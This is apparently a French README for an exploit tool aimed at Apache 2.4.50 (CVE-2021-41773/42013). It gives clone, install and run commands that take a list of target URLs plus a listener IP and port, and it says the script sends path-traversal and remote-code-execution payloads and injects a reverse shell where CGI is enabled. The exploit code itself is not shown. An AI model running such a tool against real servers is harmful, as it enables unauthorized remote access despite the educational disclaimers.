
Apache-HTTP-Server-2.4.50-RCE Cet outil est conçu pour tester les serveurs Apache pour les vulnérabilités CVE-2021-41773 / CVE-2021-42013. Il est destiné uniquement à des fins éducatives et doit être utilisé de manière responsable sur des systèmes pour lesquels vous avez une autorisation explicite de test.
Cet outil est conçu pour tester les serveurs Apache pour les vulnérabilités CVE-2021-41773 / CVE-2021-42013. Il est destiné à des fins éducatives uniquement et doit être utilisé de manière responsable sur des systèmes pour lesquels vous avez une autorisation explicite de test.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
le fichier texte doit contenir l'URL de la cible
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Vérification de la version d'Apache : Pour chaque URL dans le fichier fourni, il vérifie si le serveur exécute Apache version 2.4.50.
Si le serveur est vulnérable : Il tente d'exploiter le serveur en envoyant des payloads pour déclencher des attaques de traversée de répertoire ou exécuter du code à distance. Si CGI est activé : Il essaie d'injecter un payload de reverse shell pour obtenir un accès distant.
Pour usage éducatif uniquement : Ce script est destiné à des fins éducatives pour montrer comment les vulnérabilités peuvent être testées et exploitées. Utiliser ce script contre des cibles non autorisées est illégal et contraire à l'éthique.
But de la modification : Ajout d'une gestion d'erreurs supplémentaire et optimisation de la logique des payloads et du RCE et suppression du cve